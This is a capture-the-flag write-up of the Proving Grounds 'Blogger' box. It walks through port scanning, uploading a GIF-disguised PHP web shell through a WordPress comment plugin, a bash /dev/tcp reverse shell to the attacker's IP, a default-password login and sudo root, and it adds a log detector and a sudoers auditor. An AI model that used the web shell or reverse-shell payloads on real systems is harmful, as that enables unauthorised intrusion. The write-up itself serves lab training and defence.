
Proving Grounds - Blogger

Introduction

This is a Proving Grounds room which can be found at: Blogger

The Blog of War

Reconnaissance & Scanning

Perform an nmap scan of all TCP ports to identify open ports and services.

  • Command: nmap -p- -T4 -v 192.168.81.217
geobour98@kali:~$ nmap -p- -T4 -v 192.168.81.217
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 21:53 EEST
Initiating Ping Scan at 21:53
Scanning 192.168.81.217 [2 ports]
Completed Ping Scan at 21:53, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:53
Completed Parallel DNS resolution of 1 host. at 21:53, 0.00s elapsed
Initiating Connect Scan at 21:53
Scanning 192.168.81.217 (192.168.81.217) [65535 ports]
Discovered open port 80/tcp on 192.168.81.217
Discovered open port 22/tcp on 192.168.81.217
Completed Connect Scan at 21:53, 16.72s elapsed (65535 total ports)
Nmap scan report for 192.168.81.217 (192.168.81.217)
Host is up (0.053s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.83 seconds

Perform an aggressive nmap scan (-A enables OS detection, version detection, default scripts and traceroute) against the two open ports.

  • Command: sudo nmap -A -sC -p 22,80 -v 192.168.81.217
geobour98@kali:~$ sudo nmap -A -sC -p 22,80 -v 192.168.81.217
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 21:53 EEST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
Initiating Ping Scan at 21:53
Scanning 192.168.81.217 [4 ports]
Completed Ping Scan at 21:53, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:53
Completed Parallel DNS resolution of 1 host. at 21:53, 0.00s elapsed
Initiating SYN Stealth Scan at 21:53
Scanning 192.168.81.217 (192.168.81.217) [2 ports]
Discovered open port 22/tcp on 192.168.81.217
Discovered open port 80/tcp on 192.168.81.217
Completed SYN Stealth Scan at 21:53, 0.10s elapsed (2 total ports)
Initiating Service scan at 21:53
Scanning 2 services on 192.168.81.217 (192.168.81.217)
Completed Service scan at 21:54, 6.12s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.81.217 (192.168.81.217)
Retrying OS detection (try #2) against 192.168.81.217 (192.168.81.217)
Initiating Traceroute at 21:54
Completed Traceroute at 21:54, 0.06s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:54
Completed Parallel DNS resolution of 1 host. at 21:54, 0.00s elapsed
NSE: Script scanning 192.168.81.217.
Initiating NSE at 21:54
Completed NSE at 21:54, 6.78s elapsed
Initiating NSE at 21:54
Completed NSE at 21:54, 0.22s elapsed
Initiating NSE at 21:54
Completed NSE at 21:54, 0.00s elapsed
Nmap scan report for 192.168.81.217 (192.168.81.217)
Host is up (0.054s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
|   256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)
|_  256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Blogger | Home
| http-methods: 
|_  Supported Methods: HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.16 (93%), Linux 3.13 (92%), Linux 3.10 - 3.16 (91%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.006 days (since Mon Sep 19 21:46:10 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   55.69 ms 192.168.49.1 (192.168.49.1)
2   52.86 ms 192.168.81.217 (192.168.81.217)

NSE: Script Post-scanning.
Initiating NSE at 21:54
Completed NSE at 21:54, 0.00s elapsed
Initiating NSE at 21:54
Completed NSE at 21:54, 0.00s elapsed
Initiating NSE at 21:54
Completed NSE at 21:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.70 seconds
           Raw packets sent: 78 (5.316KB) | Rcvd: 42 (16.692KB)

Brute-force the web server for directories using gobuster.

  • Command: gobuster dir -u http://192.168.81.217/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
geobour98@kali:~$ gobuster dir -u http://192.168.81.217/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.81.217/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/19 21:56:47 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 317] [--> http://192.168.81.217/assets/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.81.217/css/]   
/images               (Status: 301) [Size: 317] [--> http://192.168.81.217/images/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.81.217/js/]    
/server-status        (Status: 403) [Size: 279]                                    
                                                                                   
===============================================================
2022/09/19 22:00:56 Finished
===============================================================

Browsing the site on port 80 and the /assets directory leads to the URL http://192.168.81.217/assets/fonts/blog/, which appears to be a blog that is not rendering correctly.

Hovering over most of the links shows that they point to blogger.thm, so for the blog to render correctly we need to map that domain name to the IP address in the /etc/hosts file.

The operating system will then resolve the hostname blogger.thm to the IP 192.168.81.217.

The contents of /etc/hosts should look like this:

geobour98@kali:~$ cat /etc/hosts
[REDACTED]
192.168.81.217  blogger.thm
[REDACTED]

Exploitation

Now, navigate to http://blogger.thm/assets/fonts/blog/ and the blog is displayed correctly.

It appears to be a WordPress blog, so we can use the wpscan tool to enumerate all plugins, all themes, config backups and DB exports, but no interesting results are returned.

  • Command: wpscan --url http://blogger.thm/assets/fonts/blog/ -e ap,at,cb,dbe

Opening any post reveals a comment form that allows an image to be attached.

Create cmd.php with contents:

GIF87a
<?php
system($_REQUEST['cmd']);
?>

Above the PHP code we have placed the magic bytes of a GIF file, taken from https://en.wikipedia.org/wiki/List_of_file_signatures, so that the upload filter treats our file as a GIF image.

Then attach cmd.php, open Burp Suite, turn Intercept on, and click POST COMMENT. Finally, click Forward in Burp Suite.

The request should look like this:

POST /assets/fonts/blog/wp-admin/admin-ajax.php HTTP/1.1
Host: blogger.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5658711851211151532350158244
Content-Length: 1421
Origin: http://blogger.thm
Connection: close
Referer: http://blogger.thm/assets/fonts/blog/?p=29
Cookie: wpdiscuz_hide_bubble_hint=1

-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="action"

wpdAddComment
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wc_comment"

test
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wmu_files[]"

C:\fakepath\cmd.php
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wmu_attachments"

{"images":[34]}
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wc_name"

test
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wc_email"

test@test.com
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wc_website"

https://test.com
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="submit"

Post Comment
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wpdiscuz_unique_id"

0_0
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="wpd_comment_depth"

1
-----------------------------5658711851211151532350158244
Content-Disposition: form-data; name="postId"

29
-----------------------------5658711851211151532350158244--

The file cmd.php is uploaded successfully, and in the Comments section we can see a link for cmd.php that leads to: http://blogger.thm/assets/fonts/blog/wp-content/uploads/2022/09/cmd-1663615798.9082.php.

At this point, we can execute code by navigating to: http://blogger.thm/assets/fonts/blog/wp-content/uploads/2022/09/cmd-1663615798.9082.php?cmd=id

Output:

GIF87a uid=33(www-data) gid=33(www-data) groups=33(www-data) 

We are the user www-data, so now we want to get a reverse shell.

Intercept this request: http://blogger.thm/assets/fonts/blog/wp-content/uploads/2022/09/cmd-1663615798.9082.php?cmd=id with Burp Suite, change it as shown below, click on Forward and open a netcat listener.

GET /assets/fonts/blog/wp-content/uploads/2022/09/cmd-1663615798.9082.php?cmd=bash+-c+'exec+bash+-i+%26>/dev/tcp/192.168.49.81/443+<%261' HTTP/1.1
Host: blogger.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: wpdiscuz_hide_bubble_hint=1; comment_author_email_f401df2453a4515e2d6a824db178db1a=test@test.com; comment_author_f401df2453a4515e2d6a824db178db1a=test; comment_author_url_f401df2453a4515e2d6a824db178db1a=https://test.com
Upgrade-Insecure-Requests: 1


Now we have a reverse shell as the www-data user.

geobour98@kali:~$ nc -lvnp 443
listening on [any] 443 ...                                                                               
connect to [192.168.49.81] from (UNKNOWN) [192.168.81.217] 54292                                         
bash: cannot set terminal process group (1428): Inappropriate ioctl for device                           
bash: no job control in this shell 
<ress/assets/fonts/blog/wp-content/uploads/2022/09$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<content/uploads/2022/09$ python3 -c 'import pty;pty.spawn("/bin/bash")'     
<ress/assets/fonts/blog/wp-content/uploads/2022/09$ ^Z
zsh: suspended  nc -lvnp 443

geobour98@kali:~$ stty raw -echo;fg
[1]  + continued  nc -lvnp 443
<content/uploads/2022/09$ export TERM=xterm-256color
www-data@ubuntu-xenial:/var/www/wordpress/assets/fonts/blog/wp-content/uploads/2022/09$ stty rows 38 cols 111
www-data@ubuntu-xenial:/var/www/wordpress/assets/fonts/blog/wp-content/uploads/2022/09$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
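Both requests that reached the uploaded file are visible to the web server, so a defender can catch this from the Apache access log. The following detector is an added example (not from the post): it flags any request that executes a .php file under wp-content/uploads and decodes the cmd parameter. The log lines are constructed in combined format and modelled on the two requests shown above; the byte counts and user agent are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log sample (combined format), not from the box.
SAMPLE_LOG = """\
192.168.49.81 - - [19/Sep/2022:21:58:02 +0000] "POST /assets/fonts/blog/wp-admin/admin-ajax.php HTTP/1.1" 200 311 "-" "Mozilla/5.0"
192.168.49.81 - - [19/Sep/2022:21:59:40 +0000] "GET /assets/fonts/blog/wp-content/uploads/2022/09/cmd-1663615798.9082.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
192.168.49.81 - - [19/Sep/2022:22:01:13 +0000] "GET /assets/fonts/blog/wp-content/uploads/2022/09/cmd-1663615798.9082.php?cmd=bash+-c+'exec+bash+-i+%26>/dev/tcp/192.168.49.81/443+<%261' HTTP/1.1" 200 6 "-" "Mozilla/5.0"
192.168.49.81 - - [19/Sep/2022:22:02:00 +0000] "GET /assets/fonts/blog/wp-content/uploads/2022/09/photo.gif HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

# client ip, timestamp, request line (method, target), status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Strings in a command parameter that point to a shell being spawned.
SHELL_HINT = re.compile(r"/dev/tcp/|\bbash\b|\bsh\b|\bnc\b", re.IGNORECASE)


def find_upload_execution(log_text: str) -> list[dict]:
    """Return one finding per request that executes a script under wp-content/uploads."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        path = parts.path.lower()
        if "/wp-content/uploads/" not in path or not path.endswith(".php"):
            continue  # images served from the uploads tree are expected traffic
        # parse_qs turns '+' into spaces and decodes %26, so the command is readable.
        cmd = parse_qs(parts.query).get("cmd", [""])[0]
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "path": parts.path,
            "cmd": cmd,
            "severity": "critical" if SHELL_HINT.search(cmd) else "high",
        })
    return findings
```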

Navigating to /home, we see the home folders of three users: james, ubuntu and vagrant.

Vagrant is an open-source tool for creating, configuring and managing boxes of virtual machines through a simple command-line interface.

The Vagrant tool also has a well-known default password, vagrant, for the root account. We can try that password for the vagrant user.

www-data@ubuntu-xenial:/home/vagrant$ su vagrant                                                         
Password:                                                                                                
vagrant@ubuntu-xenial:~$ id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)

Now we are the vagrant user and can read local.txt from the /home/james/ directory.

vagrant@ubuntu-xenial:/home/james$ cat local.txt 
[REDACTED]

Privilege Escalation

Running sudo -l shows that vagrant may run any command as root without a password.

vagrant@ubuntu-xenial:/home/james$ sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL) NOPASSWD: ALL
vagrant@ubuntu-xenial:/home/james$ sudo -s
root@ubuntu-xenial:/home/james# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu-xenial:/home/james# cd /root
root@ubuntu-xenial:/root# cat proof.txt
[REDACTED]
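The (ALL) NOPASSWD: ALL entry is the kind of misconfiguration a sudoers audit should catch before an attacker does. The following checker is an added example (not from the post): it parses user specifications from a constructed /etc/sudoers excerpt, skips the root baseline, and flags any principal allowed to run ALL commands as root, rating NOPASSWD entries as critical.

```python
import re

# Constructed /etc/sudoers excerpt (not taken from the box); the vagrant line
# reproduces what `sudo -l` reported above, the others are typical defaults.
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults    env_reset, mail_badpass
Defaults    secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
vagrant ALL=(ALL) NOPASSWD: ALL
james   ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# user-or-%group  hosts = (runas[:group]) [TAG: ...] command list
SPEC_RE = re.compile(
    r"^(?P<who>%?[\w.-]+)\s+(?P<hosts>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text: str) -> list[dict]:
    """Flag specs that let a non-root principal run ALL commands as root."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if not m or m["who"] == "root":
            continue  # root's own ALL entry is the expected baseline
        runas_user = (m["runas"] or "root").split(":")[0].strip()
        if m["cmds"].strip() != "ALL" or runas_user not in ("ALL", "root"):
            continue  # a fixed command list is a scoped grant, not a full bypass
        nopasswd = "NOPASSWD:" in m["tags"]
        findings.append({
            "who": m["who"],
            "runas": runas_user,
            "nopasswd": nopasswd,
            # ALL with no password is a direct path to root for that account,
            # which is exactly what the vagrant entry above provides.
            "severity": "critical" if nopasswd else "review",
        })
    return findings
```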

Proof of Concept (PoC image)

This post is licensed under CC BY 4.0 by the author.